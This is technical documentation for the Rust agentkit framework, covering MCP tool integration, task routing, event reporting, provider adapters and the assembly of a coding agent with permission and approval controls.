The Model Context Protocol (MCP) lets agents discover and use tools, resources, and prompts from external servers. This chapter covers agentkit-mcp: how MCP fits into the capability and tool layers, and how auth and lifecycle are managed.

What MCP solves

Without MCP, every external integration is a custom tool. Connecting to GitHub means writing a GitHub tool. Connecting to a database means writing a database tool. Each one has bespoke connection logic, auth handling, and discovery.

MCP standardizes this: external servers expose capabilities through a uniform protocol, and the agent discovers them at runtime instead of compile time.

Without MCP:                          With MCP:

  Agent                                Agent
  ├── GitHubTool (custom)              ├── MCP client
  ├── DatabaseTool (custom)            │   ├── github-server (discovered)
  ├── SlackTool (custom)               │   ├── database-server (discovered)
  └── JiraTool (custom)                │   └── slack-server (discovered)
                                       │
  Each tool: custom code,              Each server: standard protocol,
  custom auth, custom schema           standard auth, standard schema

MCP in the capability model

MCP servers expose three capability types, which map directly to agentkit’s capability layer:

  MCP concept     agentkit abstraction          How it’s used
  MCP tools       Invocable → adapted to Tool   Model calls them during turns
  MCP resources   ResourceProvider              Host reads them for context loading
  MCP prompts     PromptProvider                Host renders them for transcript injection

An MCP server implements CapabilityProvider, exposing all three through one registration point.

Server configuration

#![allow(unused)]
fn main() {
pub struct McpServerConfig {
    pub id: McpServerId,
    pub transport: McpTransportBinding,
    pub auth: McpAuthConfig,
    pub metadata: MetadataMap,
}
}

Built-in transports: stdio (local child process), Streamable HTTP (modern remote MCP), and legacy SSE (deprecated HTTP+SSE compatibility). Custom transports implement the McpTransportFactory trait.

Discovery

After connecting, the server’s capabilities are captured in a snapshot:

#![allow(unused)]
fn main() {
pub struct McpDiscoverySnapshot {
    pub server_id: McpServerId,
    pub tools: Vec<McpToolDescriptor>,
    pub resources: Vec<McpResourceDescriptor>,
    pub prompts: Vec<McpPromptDescriptor>,
    pub metadata: MetadataMap,
}
}

Snapshots are cacheable and refreshable. Hosts choose which capabilities to expose — discovery doesn’t automatically register everything.

Tool adaptation

McpToolAdapter wraps an MCP tool as a Tool implementation:

  • Exposes a ToolSpec derived from the MCP tool descriptor
  • Translates ToolRequest into MCP invocation
  • Translates MCP responses into normalized ToolResult
  • Surfaces auth interruptions as ToolInterruption::AuthRequired

Namespacing

MCP tools are namespaced by default: mcp.<server_id>.<tool_name>. This prevents collisions with native tools. Hosts can override names if they want a cleaner surface.
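
The default naming scheme is simple string composition:

```rust
#![allow(unused)]
/// Default MCP tool namespacing: mcp.<server_id>.<tool_name>.
/// Keeps discovered tools from colliding with native tool names.
fn namespaced_tool_name(server_id: &str, tool_name: &str) -> String {
    format!("mcp.{server_id}.{tool_name}")
}

fn main() {
    assert_eq!(namespaced_tool_name("github", "search"), "mcp.github.search");
    assert_eq!(namespaced_tool_name("db", "query"), "mcp.db.query");
}
```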

Auth as interruption

MCP auth follows the same interrupt pattern as tool approvals:

  1. Tool invocation triggers an auth requirement
  2. The tool adapter returns ToolInterruption::AuthRequired
  3. The loop surfaces it as LoopStep::Interrupt(AuthRequest)
  4. The host performs the auth flow (OAuth, API key entry, etc.)
  5. The host resolves the interrupt and the operation resumes

Auth is never hidden retry logic. The host always knows when auth is happening and controls the flow.

For non-tool MCP operations (connecting, reading resources), auth follows the same pattern but through the MCP manager API rather than the loop interrupt system.

Resources and prompts

Resources and prompts have dedicated APIs, separate from the tool path:

#![allow(unused)]
fn main() {
pub trait McpResourceStore {
    async fn list_resources(&self, server: &McpServerId) -> ...;
    async fn read_resource(&self, server: &McpServerId, resource: &McpResourceId) -> ...;
}

pub trait McpPromptStore {
    async fn list_prompts(&self, server: &McpServerId) -> ...;
    async fn get_prompt(&self, server: &McpServerId, prompt: &McpPromptId, args: Value) -> ...;
}
}

MCP resources integrate with agentkit-context for injecting project-specific data into the transcript. MCP prompts integrate with context loading for template-based prompt assembly.

Transports

Transport details stay inside agentkit-mcp:

#![allow(unused)]
fn main() {
pub trait McpTransport: Send {
    async fn send(&mut self, message: McpFrame) -> Result<(), McpError>;
    async fn recv(&mut self) -> Result<Option<McpFrame>, McpError>;
    async fn close(&mut self) -> Result<(), McpError>;
}
}

Built-in transports:

  Transport         Connection                                Use case
  stdio             Spawn child process, pipe stdin/stdout    Local tool servers
  Streamable HTTP   HTTP POST with JSON or SSE responses      Modern remote tool servers
  SSE               HTTP connection with server-sent events   Legacy remote tool servers

The rest of agentkit doesn’t know whether a server is reached via stdio, TCP, or WebSocket. The transport is configured in McpServerConfig and the MCP manager handles the connection lifecycle.

stdio transport

The most common pattern for local MCP servers. The agent spawns the server as a child process and communicates over stdin/stdout:

Agent process ──── stdin ────▶ MCP server process
              ◀── stdout ────

This is how tools like GitHub’s MCP server, filesystem tools, and database connectors typically run. The server starts on demand and exits when the agent disconnects.

Streamable HTTP transport

For modern remote MCP servers that run as HTTP services. The agent sends JSON-RPC over HTTP POST, receives either JSON or SSE responses, and tracks negotiated session/protocol headers:

Agent ──── HTTP POST ────▶ Remote MCP server
      ◀── JSON or SSE ───

If an SSE response stream is interrupted before the matching response arrives, the client can resume with Last-Event-ID.

Legacy SSE transport

For older MCP servers that still use the deprecated HTTP+SSE transport, agentkit-mcp also keeps the original SSE endpoint flow.

The full picture

┌──────────────────────────────────────────────────────────┐
│  Agent loop                                              │
│                                                          │
│  ┌──────────────────────┐   ┌──────────────────────┐     │
│  │  Native tools        │   │  MCP tools           │     │
│  │  (ToolRegistry)      │   │  (McpToolAdapter)    │     │
│  │  fs.read_file        │   │  mcp.github.search   │     │
│  │  shell.exec          │   │  mcp.db.query        │     │
│  └──────────┬───────────┘   └──────────┬───────────┘     │
│             │                          │                 │
│             └──── unified tool list ───┘                 │
│                        │                                 │
│               presented to model                         │
│                                                          │
│  MCP resources ──▶ ContextLoader ──▶ transcript          │
│  MCP prompts   ──▶ ContextLoader ──▶ transcript          │
└──────────────────────────────────────────────────────────┘

Native tools and MCP tools appear as a single list to the model. The model doesn’t know (or need to know) which tools come from MCP and which are native. The mcp.<server_id>. prefix distinguishes them in the tool name for human readers and policy evaluation, but the model just sees a tool spec with a name and schema.

Example: openrouter-mcp-tool demonstrates MCP tool discovery and invocation. openrouter-agent-cli shows MCP integrated into a full agent with context, tools, and compaction.

Crate: agentkit-mcp — depends on agentkit-capabilities, agentkit-tools-core, and agentkit-core.

Task management and parallelism

When an agent calls multiple tools in a single turn, running them sequentially wastes time. When a shell command takes 30 seconds, the agent shouldn’t be blocked waiting. This chapter covers agentkit-task-manager: how tool calls are scheduled, routed, and delivered.

The problem

The default behavior is sequential: tool calls execute one at a time on the current task. This is correct and simple, but it becomes a bottleneck when:

  • The model requests multiple independent tool calls
  • A shell command runs for a long time
  • You want to start background work while the model continues

TaskManager trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait TaskManager {
    async fn start_task(&self, request: TaskLaunchRequest, ctx: TaskStartContext)
        -> Result<TaskStartOutcome, TaskManagerError>;

    async fn wait_for_turn(&self, turn_id: &TurnId, cancellation: Option<TurnCancellation>)
        -> Result<Option<TurnTaskUpdate>, TaskManagerError>;

    async fn take_pending_loop_updates(&self)
        -> Result<PendingLoopUpdates, TaskManagerError>;

    async fn on_turn_interrupted(&self, turn_id: &TurnId)
        -> Result<(), TaskManagerError>;

    fn handle(&self) -> TaskManagerHandle;
}
}

SimpleTaskManager (default)

Runs every tool call inline. No Tokio dependency. No concurrency. Returns the result before the driver continues. This is the default when no task manager is configured.

AsyncTaskManager

Spawns each tool call as a Tokio task. Tasks are classified through a TaskRoutingPolicy:

#![allow(unused)]
fn main() {
pub enum RoutingDecision {
    Foreground,
    Background,
    ForegroundThenDetachAfter(Duration),
}
}

  • Foreground — blocks the current turn until resolved
  • Background — runs independently, results delivered later
  • ForegroundThenDetachAfter(Duration) — starts foreground, automatically promotes to background if it hasn’t finished within the timeout

Routing policies

Implement TaskRoutingPolicy or use a closure:

#![allow(unused)]
fn main() {
let task_manager = AsyncTaskManager::new().routing(|req: &ToolRequest| {
    if req.tool_name.0 == "shell.exec" {
        RoutingDecision::ForegroundThenDetachAfter(Duration::from_secs(5))
    } else {
        RoutingDecision::Foreground
    }
});
}

This lets you make filesystem tools synchronous (fast, no overhead) while giving shell commands a timeout before they detach.

Task lifecycle events

The TaskManagerHandle provides an event stream:

pub enum TaskEvent {
    Started(TaskSnapshot),
    Detached(TaskSnapshot),
    Completed(TaskSnapshot, ToolResultPart),
    Cancelled(TaskSnapshot),
    Failed(TaskSnapshot, ToolError),
    ContinueRequested,
}

Host code can subscribe to these events for progress reporting, UI updates, or manual task management:

let handle = task_manager.handle();
// List running tasks, cancel tasks, drain results, subscribe to events

Integration with the loop

The loop driver integrates with the task manager transparently:

  1. Tool call arrives from the model
  2. Driver asks the task manager to start a task
  3. If TaskStartOutcome::Ready — result is immediately available
  4. If TaskStartOutcome::Pending — driver waits for foreground tasks via wait_for_turn()
  5. Background task results are picked up via take_pending_loop_updates() on the next iteration
  6. Background results are injected into the transcript as tool results

The detach-after-timeout pattern

ForegroundThenDetachAfter deserves special attention. It solves a common problem: you want the model to wait for a command’s output, but you don’t want a slow command to block the entire turn.

ForegroundThenDetachAfter(5s) — two possible outcomes:

Fast command (< 5s):

  t=0s  Task starts (foreground)
  t=3s  Command finishes → result returned immediately
        └── Model sees output, continues normally
        └── Identical to pure Foreground routing


Slow command (> 5s):

  t=0s  Task starts (foreground)
  t=5s  Timeout expires → task promoted to background
        └── Model receives: "Task detached (still running)"
        └── Model continues its turn (reads files, etc.)
  t=30s Command finishes → result stored
        └── On next turn, driver picks up the result
        └── Result injected into transcript as a tool result

This is the right default for shell commands in a coding agent:

  • cargo check (2 seconds) → foreground, model sees the output immediately
  • cargo test (30 seconds) → detaches after 5s, model continues working
  • ls (instant) → foreground, practically no delay
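The mechanics can be sketched with plain std threads and channels. This is illustrative only — agentkit's AsyncTaskManager does this with Tokio tasks, and the names here (`TaskOutcome`, `start_with_detach`) are hypothetical, not library API:

```rust
use std::sync::mpsc;
use std::thread;
use std::time::Duration;

// Outcome of starting a task with a detach window.
enum TaskOutcome {
    Finished(String),                 // completed within the window (foreground path)
    Detached(mpsc::Receiver<String>), // still running; poll the receiver on a later turn
}

// Run `work` on its own thread, wait up to `detach_after` for the result,
// and otherwise hand back the receiver so the result can be collected later.
fn start_with_detach(
    work: impl FnOnce() -> String + Send + 'static,
    detach_after: Duration,
) -> TaskOutcome {
    let (tx, rx) = mpsc::channel();
    thread::spawn(move || {
        let _ = tx.send(work());
    });
    match rx.recv_timeout(detach_after) {
        Ok(output) => TaskOutcome::Finished(output),
        Err(_) => TaskOutcome::Detached(rx),
    }
}
```

The key property is that the caller's code path is identical either way: it gets an answer now, or a handle it can drain later — exactly the two timelines above.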

How background results re-enter the loop

When the driver starts a new turn, it calls task_manager.take_pending_loop_updates(). Any completed background tasks have their results injected into the transcript before the model sees it:

Turn N:
  Model: ToolCall(shell.exec, "cargo test")
  Task manager: starts foreground, detaches after 5s
  Model receives: "task detached"
  Model: ToolCall(fs.read_file, "src/test_results.rs")  ← continues working
  Turn ends

Turn N+1:
  take_pending_loop_updates() → cargo test finished: "3 tests passed"
  Result injected into transcript
  Model sees: tool result from cargo test + new user message
  Model: "All 3 tests pass. Here's what I changed..."

Task lifecycle

              ┌─────────────────┐
              │     Started     │
              └────────┬────────┘
                       │
        ┌──────────────┼─────────────┐
        │              │             │
  Foreground    FG then detach   Background
        │              │             │
        │         ┌────▼─────┐       │
        │         │ timeout? │       │
        │         └──┬───┬───┘       │
        │         no │   │ yes       │
        │            │   │           │
  ┌─────▼────────────▼┐  │  ┌────────▼──────┐
  │    Foreground     │  │  │  Background   │
  │    (blocks turn)  │  │  │  (async)      │
  └─────────┬─────────┘  │  └──────┬────────┘
            │            │         │
            │     ┌──────▼─────┐   │
            │     │  Detached  │   │
            │     │  (async)   │   │
            │     └──────┬─────┘   │
            │            │         │
       ┌────▼────────────▼─────────▼────┐
       │       Completed / Failed       │
       └────────────────────────────────┘

Choosing a routing strategy

  Scenario                                 Recommended routing                 Why
  File read/write                          Foreground                          Fast, order matters, model needs result immediately
  Short shell commands (ls, git status)    Foreground                          Fast enough that detach overhead isn't worth it
  Build commands (cargo build, npm build)  ForegroundThenDetachAfter(5-10s)    May be fast, may be slow — let the timeout decide
  Test suites                              ForegroundThenDetachAfter(5s)       Often slow, model can do other work while waiting
  Long-running servers                     Background                          Model shouldn't wait at all
  Independent parallel tool calls          Foreground (with AsyncTaskManager)  AsyncTaskManager runs foreground tasks concurrently

Example: openrouter-parallel-agent uses AsyncTaskManager with ForegroundThenDetachAfter routing for shell tools and foreground routing for filesystem tools. The TaskManagerHandle event stream is printed to stderr.

Crate: agentkit-task-manager — depends on agentkit-tools-core, agentkit-core, and tokio.

Reporting and observability

An agent that you can’t observe is an agent you can’t debug. This chapter covers agentkit-reporting: how events flow from the loop to observers, and the built-in reporter implementations.

The observer contract

pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}

Observers are synchronous and called in deterministic order. This is a deliberate choice:

  • Deterministic ordering — if event B depends on event A, observers always see A first
  • No async leakage — the loop stays runtime-agnostic
  • Simple reasoning — observer behavior is fully predictable

The cost is that observers must be fast. Heavy processing should happen behind a channel adapter.

Event flow:

  LoopDriver
       │
       ├── emit(AgentEvent)
       │        │
       │        ├──▶ Observer 1 (StdoutReporter)    → print to terminal
       │        ├──▶ Observer 2 (JsonlReporter)      → write to log file
       │        └──▶ Observer 3 (UsageReporter)      → accumulate counters
       │
       │   Observers are called in registration order.
       │   Each observer blocks until it returns.
       │   Total time = sum of all observer handle_event() calls.
       │
       └── continue loop execution

Built-in reporters

StdoutReporter

Human-readable terminal output. Handles streaming text deltas, tool lifecycle notices, approval prompts, and turn summaries. Intentionally conservative — line-oriented output, no cursor management or advanced TUI tricks.

JsonlReporter

One structured JSON object per event, newline-delimited. Useful for audit logs, debugging, and external system ingestion. Uses a stable envelope format with event type, timestamp, session ID, turn ID, and payload.

UsageReporter

Aggregates token usage across a session: input tokens, output tokens, reasoning tokens, cached input tokens, cache write tokens, estimated cost. Exposes query methods for per-turn and cumulative totals.
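A minimal sketch of that accumulation — the field names here are illustrative, not the real Usage type:

```rust
// Illustrative usage accumulator: per-turn records plus running totals.
#[derive(Clone, Copy, Debug, Default, PartialEq)]
struct Usage {
    input_tokens: u64,
    output_tokens: u64,
}

#[derive(Default)]
struct UsageTracker {
    per_turn: Vec<Usage>,
    total: Usage,
}

impl UsageTracker {
    // Called on every usage update event.
    fn record(&mut self, turn: Usage) {
        self.total.input_tokens += turn.input_tokens;
        self.total.output_tokens += turn.output_tokens;
        self.per_turn.push(turn);
    }
}
```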

TranscriptReporter

Reconstructs an inspectable transcript from events. Useful for debugging, persistence, and testing. Important constraint: the reporter reconstructs a derived view — the loop owns the authoritative working transcript.

CompositeReporter

Fans out events to multiple child reporters:

let reporter = CompositeReporter::new()
    .with_observer(StdoutReporter::new(std::io::stderr()))
    .with_observer(JsonlReporter::new(file))
    .with_observer(UsageReporter::new());

Adapter reporters

For expensive or async reporting:

  • BufferedReporter — enqueues events for batch flushing
  • ChannelReporter — forwards events to another thread or task via a sender
  • TracingReporter — converts events into tracing spans and events

These adapters wrap the synchronous observer contract without changing it.
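The channel pattern can be sketched with std primitives. This is a simplified stand-in for a ChannelReporter-style adapter — the `Event` and `Observer` types are abbreviated versions of AgentEvent and LoopObserver, not the real definitions:

```rust
use std::sync::mpsc;
use std::thread;

// Minimal stand-ins for AgentEvent and LoopObserver.
#[derive(Debug, Clone, PartialEq)]
enum Event {
    Delta(String),
    TurnFinished,
}

trait Observer: Send {
    fn handle_event(&mut self, event: Event);
}

// Loop-side observer: handle_event only enqueues, so the loop never blocks
// on slow I/O. A worker thread drains the channel and does the heavy work.
struct ChannelObserver {
    tx: mpsc::Sender<Event>,
}

impl Observer for ChannelObserver {
    fn handle_event(&mut self, event: Event) {
        let _ = self.tx.send(event);
    }
}

// Spawn the worker; here it just collects events, but this is where
// expensive processing (network export, heavy formatting) would live.
fn spawn_worker() -> (ChannelObserver, thread::JoinHandle<Vec<Event>>) {
    let (tx, rx) = mpsc::channel();
    let worker = thread::spawn(move || rx.iter().collect());
    (ChannelObserver { tx }, worker)
}
```

Dropping the observer closes the channel, which is a natural shutdown signal for the worker.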

Failure policy

Reporter failures are non-fatal by default. A broken log writer shouldn’t crash the agent. Hosts can configure stricter behavior:

  • Ignore — swallow errors
  • Log — log errors to stderr
  • Accumulate — collect errors for later inspection
  • FailFast — abort on first error

Writing a custom observer

The trait is simple enough that custom observers are straightforward:

struct ToolCallCounter {
    count: usize,
}

impl LoopObserver for ToolCallCounter {
    fn handle_event(&mut self, event: AgentEvent) {
        if matches!(event, AgentEvent::ToolCallRequested(_)) {
            self.count += 1;
        }
    }
}

A more practical example — a reporter that writes tool calls to a structured log:

use std::fs::File;
use std::io::{BufWriter, Write};

struct AuditLogger {
    writer: BufWriter<File>,
}

impl LoopObserver for AuditLogger {
    fn handle_event(&mut self, event: AgentEvent) {
        match &event {
            AgentEvent::ToolCallRequested(call) => {
                writeln!(self.writer, "TOOL_CALL: {} input={}", call.name,
                    serde_json::to_string(&call.input).unwrap_or_default()
                ).ok();
            }
            AgentEvent::ApprovalRequired(req) => {
                writeln!(self.writer, "APPROVAL_REQUIRED: {} reason={:?}",
                    req.summary, req.reason
                ).ok();
            }
            _ => {}
        }
    }
}

AgentEvent categories

  Category     Events
  Lifecycle    RunStarted, TurnStarted, TurnFinished, RunFailed
  Input        InputAccepted
  Streaming    ContentDelta
  Tools        ToolCallRequested
  Approval     ApprovalRequired, ApprovalResolved
  Auth         AuthRequired, AuthResolved
  Compaction   CompactionStarted, CompactionFinished
  Usage        UsageUpdated
  Diagnostic   Warning

Event timeline for a typical turn

RunStarted { session_id }
│
├── InputAccepted { items: [User("Fix the bug")] }
├── TurnStarted { session_id, turn_id: "turn-1" }
│   ├── ContentDelta(BeginPart { kind: Text })
│   ├── ContentDelta(AppendText { chunk: "I'll " })
│   ├── ContentDelta(AppendText { chunk: "read the file." })
│   ├── ContentDelta(CommitPart { part: Text("I'll read the file.") })
│   ├── ToolCallRequested(ToolCallPart { name: "fs.read_file", ... })
│   └── UsageUpdated(Usage { input: 1500, output: 200 })
│
├── TurnStarted { session_id, turn_id: "turn-2" }  ← automatic tool roundtrip
│   ├── ContentDelta(...)                            ← model response after reading file
│   ├── ToolCallRequested(ToolCallPart { name: "fs.replace_in_file", ... })
│   └── UsageUpdated(Usage { ... })
│
└── TurnFinished(TurnResult { finish_reason: Completed, ... })

Example: openrouter-agent-cli uses a composite reporter with stdout and usage reporting.

Crate: agentkit-reporting — depends on agentkit-loop for event types.

Provider adapters

Chapter 1 built an adapter from scratch for a hypothetical non-standard API, then introduced the CompletionsAdapter for OpenAI-compatible providers. This chapter goes deeper on the CompletionsProvider pattern that most real providers use.

Two paths to an adapter

Path 1: Implement ModelAdapter/ModelSession/ModelTurn directly
  └── For non-standard APIs (custom REST, gRPC, WebSocket)
  └── Full control, full responsibility
  └── ~200-500 lines of translation code

Path 2: Implement CompletionsProvider (via agentkit-adapter-completions)
  └── For OpenAI-compatible chat completions APIs
  └── ~50-100 lines: config + hooks
  └── Transcript conversion, tool serialization, streaming, error handling — all handled

Most providers speak the OpenAI chat completions format (or close variants). For these, CompletionsProvider is the right choice. It handles the ~1000 lines of translation that every completions-compatible adapter needs.

The CompletionsProvider trait

pub trait CompletionsProvider: Send + Sync + Clone {
    type Config: Serialize + Clone + Send + Sync;

    fn provider_name(&self) -> &str;
    fn endpoint_url(&self) -> &str;
    fn config(&self) -> &Self::Config;

    // Hooks — defaults pass through unchanged:
    fn preprocess_request(&self, builder: RequestBuilder) -> RequestBuilder { builder }
    fn apply_prompt_cache(&self, body: &mut Map<String, Value>, request: &TurnRequest) -> Result<(), LoopError> { Ok(()) }
    fn preprocess_response(&self, _status: StatusCode, _body: &str) -> Result<(), LoopError> { Ok(()) }
    fn postprocess_response(&self, _usage: &mut Option<Usage>, _metadata: &mut MetadataMap, _raw: &Value) {}
}

The trait has three required methods (name, URL, config) and four optional hooks. Here’s what each hook is for:

Request lifecycle with hooks:

  TurnRequest
       │
       ▼
  Build JSON body (transcript → messages, tools → tools array)
  Merge Config fields into body
       │
       ├── preprocess_request(builder) ← add auth headers, custom headers
       │
       ├── apply_prompt_cache(body, request) ← map normalized cache requests
       │
       ▼
  HTTP POST to endpoint_url()
       │
       ▼
  Read response
       │
       ├── preprocess_response(status, body) ← check for API errors in 200 responses
       │
       ▼
  Parse into ModelTurnEvents
       │
       ├── postprocess_response(usage, metadata, raw) ← extract provider-specific fields
       │
       ▼
  Return events to loop

What CompletionsAdapter handles

The generic CompletionsAdapter<P> handles all the common work:

  Concern                        Implementation
  Vec<Item> → messages[]         Maps all ItemKind and Part variants
  Vec<ToolSpec> → tools[]        Converts name, description, JSON Schema
  Multimodal content encoding    Images as image_url, audio as input_audio
  P::Config → request body       Serialize and merge fields
  SSE stream parsing             Chunk reassembly, delta emission
  Tool call accumulation         Collect streaming JSON fragments into complete calls
  finish_reason → FinishReason   Map provider strings to enum variants
  usage → Usage                  Map token counts and cost
  Cancellation                   Race HTTP future against TurnCancellation
  Error status codes             Convert 4xx/5xx into LoopError
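Of these, tool call accumulation is worth a closer look: providers stream tool-call arguments as JSON fragments keyed by call id, and the adapter must reassemble them into one complete argument string per call before emitting a ToolCallPart. A simplified, std-only sketch of that reassembly (the function name is illustrative):

```rust
use std::collections::BTreeMap;

// Reassemble streamed (call_id, json_fragment) pairs into complete
// argument strings, one per call id, preserving fragment order.
fn accumulate_tool_calls(fragments: &[(&str, &str)]) -> BTreeMap<String, String> {
    let mut calls: BTreeMap<String, String> = BTreeMap::new();
    for (id, fragment) in fragments {
        calls.entry((*id).to_string()).or_default().push_str(fragment);
    }
    calls
}
```

Fragments for different calls can interleave in the stream; keying by call id makes the interleaving harmless.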

The Config associated type

The Config type is where providers differ most. Each provider has different parameter names and supported options:

  Provider   max_tokens field        Extra fields
  OpenAI     max_completion_tokens   frequency_penalty, presence_penalty
  Ollama     num_predict             top_k
  Mistral    max_tokens              —
  Groq       max_completion_tokens   —
  vLLM       max_tokens              —

By making Config an associated type with Serialize, each provider declares exactly the fields it supports with their correct names. The adapter serializes the struct and merges it into the request body — no field name mapping needed.
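A hand-rolled sketch of that merge, with Option fields standing in for serde's skip_serializing_if behavior — the struct, field names, and helper are illustrative, and the body is a string map rather than real JSON:

```rust
use std::collections::BTreeMap;

// Illustrative request config for an Ollama-style provider: only the
// fields this provider supports, under the provider's own names.
#[derive(Default)]
struct OllamaRequestConfig {
    temperature: Option<f64>,
    num_predict: Option<u32>,
}

// Merge set fields into the request body; unset fields are skipped,
// mirroring #[serde(skip_serializing_if = "Option::is_none")].
fn merge_into_body(cfg: &OllamaRequestConfig, body: &mut BTreeMap<String, String>) {
    if let Some(t) = cfg.temperature {
        body.insert("temperature".to_string(), t.to_string());
    }
    if let Some(n) = cfg.num_predict {
        body.insert("num_predict".to_string(), n.to_string());
    }
}
```

Because each provider's config declares its own field names, there is no central mapping table to keep in sync.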

Building a provider: the pattern

Every provider crate follows the same structure:

agentkit-provider-{name}/
  src/lib.rs
    ├── {Name}Config         // User-facing config (new, with_temperature, from_env, etc.)
    ├── {Name}RequestConfig  // Serializable request fields (#[serde(skip_serializing_if)])
    ├── {Name}Provider       // CompletionsProvider impl
    └── {Name}Adapter        // Newtype over CompletionsAdapter<{Name}Provider>
                             // Implements ModelAdapter by delegation

The user-facing API:

let adapter = OllamaAdapter::new(
    OllamaConfig::new("llama3.1:8b")
        .with_temperature(0.0)
        .with_num_predict(4096),
)?;

let agent = Agent::builder()
    .model(adapter)
    .build()?;

Available providers

agentkit ships six provider crates:

  Crate                          Auth              Hooks used
  agentkit-provider-openrouter   Bearer + headers  auth, cache mapping, error check, cost
  agentkit-provider-openai       Bearer            auth, cache mapping
  agentkit-provider-ollama       none              none
  agentkit-provider-vllm         optional Bearer   preprocess_request (optional auth)
  agentkit-provider-groq         Bearer            preprocess_request (auth)
  agentkit-provider-mistral      Bearer            preprocess_request (auth)

Ollama is the simplest — no auth, no hooks. OpenRouter is the most complex — it uses auth headers, prompt-cache mapping, 200-with-error handling, and response enrichment.

When to implement ModelAdapter directly

Use the raw traits when:

  • The provider doesn’t speak the OpenAI chat completions format
  • The provider uses WebSocket or gRPC instead of HTTP
  • The provider has server-side session state
  • You need streaming behavior that SSE doesn’t support

For WebSocket-based providers:

  • start_session opens the connection
  • begin_turn sends a continuation frame (not the full transcript)
  • next_event reads from the live connection
  • Session cleanup on drop

Testing adapters

Whether you use CompletionsProvider or implement the raw traits, the normalization contract is the same. Test these guarantees:

  1. Text completion → correct Delta sequence ending with CommitPart and Finished
  2. Tool calls → ToolCallPart with valid IDs and parseable JSON input
  3. Multiple tool calls → one ToolCall event per call
  4. Token limit → FinishReason::MaxTokens
  5. Cancellation → clean LoopError::Cancelled
  6. Usage → non-zero, plausible token counts

For CompletionsProvider implementations, you mostly need to test the hooks — the generic adapter handles everything else. Mock the HTTP layer with a test server that returns known SSE responses.

Crate: agentkit-adapter-completions — the generic adapter. agentkit-provider-* — provider-specific implementations.

Architecture of a coding agent

This chapter steps back from individual crates and looks at how they compose into a complete coding agent — the kind of tool exemplified by Claude Code or Codex CLI.

The previous chapters covered each crate in isolation. This chapter shows how they fit together. The goal is not to document every API — that’s what the earlier chapters did. The goal is to show the composition pattern and the trade-offs involved.

What a coding agent needs

A production coding agent requires all of the pieces we’ve covered:

  Concern                       agentkit crate
  Transcript and data model     agentkit-core
  Capability abstraction        agentkit-capabilities
  Agent loop and driver         agentkit-loop
  Tool registry and execution   agentkit-tools-core
  File read/write/edit          agentkit-tool-fs
  Shell command execution       agentkit-tool-shell
  Project context loading       agentkit-context
  Transcript management         agentkit-compaction
  Async task scheduling         agentkit-task-manager
  Event reporting               agentkit-reporting
  LLM provider adapter          agentkit-provider-openrouter

Plus host-specific concerns:

  • CLI argument parsing and input handling
  • Terminal rendering and streaming output
  • Permission policy configuration
  • Error recovery and retry strategy
  • Session management

The composition pattern

// 1. Configure tools
let tools = agentkit_tool_fs::registry()
    .merge(agentkit_tool_shell::registry());

// 2. Configure permissions
let permissions = CompositePermissionChecker::new(PermissionDecision::Deny(default_denial()))
    .with_policy(PathPolicy::new().allow_root(workspace_root))
    .with_policy(CommandPolicy::new().require_approval_for_unknown(true));

// 3. Configure compaction
let compaction = CompactionConfig::new(
    ItemCountTrigger::new(20),
    CompactionPipeline::new()
        .with_strategy(DropReasoningStrategy::new())
        .with_strategy(KeepRecentStrategy::new(12)
            .preserve_kind(ItemKind::System)
            .preserve_kind(ItemKind::Context)),
);

// 4. Configure task management
let task_manager = AsyncTaskManager::new().routing(|req: &ToolRequest| {
    if req.tool_name.0 == "shell.exec" {
        RoutingDecision::ForegroundThenDetachAfter(Duration::from_secs(10))
    } else {
        RoutingDecision::Foreground
    }
});

// 5. Configure reporting
let reporter = CompositeReporter::new()
    .with_observer(StdoutReporter::new(std::io::stderr()))
    .with_observer(UsageReporter::new());

// 6. Load context
let context_items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .load()
    .await?;

// 7. Assemble the agent
let agent = Agent::builder()
    .model(OpenRouterAdapter::new(OpenRouterConfig::new(api_key, model))?)
    .tools(tools)
    .permissions(permissions)
    .compaction(compaction)
    .task_manager(task_manager)
    .observer(reporter)
    .build()?;

The host loop

The host application drives the interaction:

let mut driver = agent.start(session_config).await?;

// Submit system prompt and context
driver.submit_input(system_items)?;
driver.submit_input(context_items)?;

loop {
    // Get user input
    let user_input = read_line()?;
    driver.submit_input(vec![user_item(user_input)])?;

    // Run the agent turn
    loop {
        match driver.next().await? {
            LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(req)) => {
                let decision = prompt_user_approval(&req)?;
                driver.resolve_approval(decision)?;
            }
            LoopStep::Interrupt(LoopInterrupt::AuthRequest(req)) => {
                let resolution = handle_auth(&req)?;
                driver.resolve_auth(resolution)?;
            }
            LoopStep::Interrupt(LoopInterrupt::AwaitingInput(_)) => break,
            LoopStep::Finished(result) => {
                print_usage(&result);
                break;
            }
        }
    }
}

Crate dependency graph

agentkit-core                    (no dependencies)
     │
     ├── agentkit-capabilities
     │        │
     │        ├── agentkit-tools-core
     │        │        │
     │        │        ├── agentkit-tool-fs
     │        │        ├── agentkit-tool-shell
     │        │        └── agentkit-tool-skills
     │        │
     │        └── agentkit-mcp
     │
     ├── agentkit-compaction
     │
     ├── agentkit-context
     │
     ├── agentkit-task-manager
     │
     ├── agentkit-reporting
     │
     ├── agentkit-adapter-completions
     │        │
     │        ├── agentkit-provider-openrouter
     │        ├── agentkit-provider-openai
     │        ├── agentkit-provider-ollama
     │        ├── agentkit-provider-vllm
     │        ├── agentkit-provider-groq
     │        └── agentkit-provider-mistral
     │
     └── agentkit-loop          (coordinates everything)
              │
              └── agentkit      (re-exports for convenience)

Every crate depends on agentkit-core. The loop crate depends on tools, compaction, and task management. Provider crates depend on the completions adapter. Everything else is a leaf.

Design trade-offs

Sequential vs parallel tool execution

The default SimpleTaskManager is sequential. For a coding agent, this is often fine — file operations are fast and order matters. Shell commands are the exception: builds and tests can take seconds or minutes. ForegroundThenDetachAfter gives you the best of both worlds.

  Tool type          Recommended routing                Why
  Filesystem tools   Foreground                         Fast, order-sensitive
  Shell tools        ForegroundThenDetachAfter(5-10s)   May be fast or slow
  MCP tools          Foreground                         Usually fast

Compaction strategy

Aggressive compaction loses context. Conservative compaction hits the context window. The right balance depends on the model’s context size and the nature of the work.

Recommended starting point:

  Trigger: 20 items
  Pipeline:
    1. DropReasoningStrategy         (reasoning blocks are verbose, rarely needed later)
    2. DropFailedToolResultsStrategy (failed tool results add noise)
    3. KeepRecentStrategy(12)        (keep last 12 non-preserved items)
       .preserve_kind(System)        (system prompt is always needed)
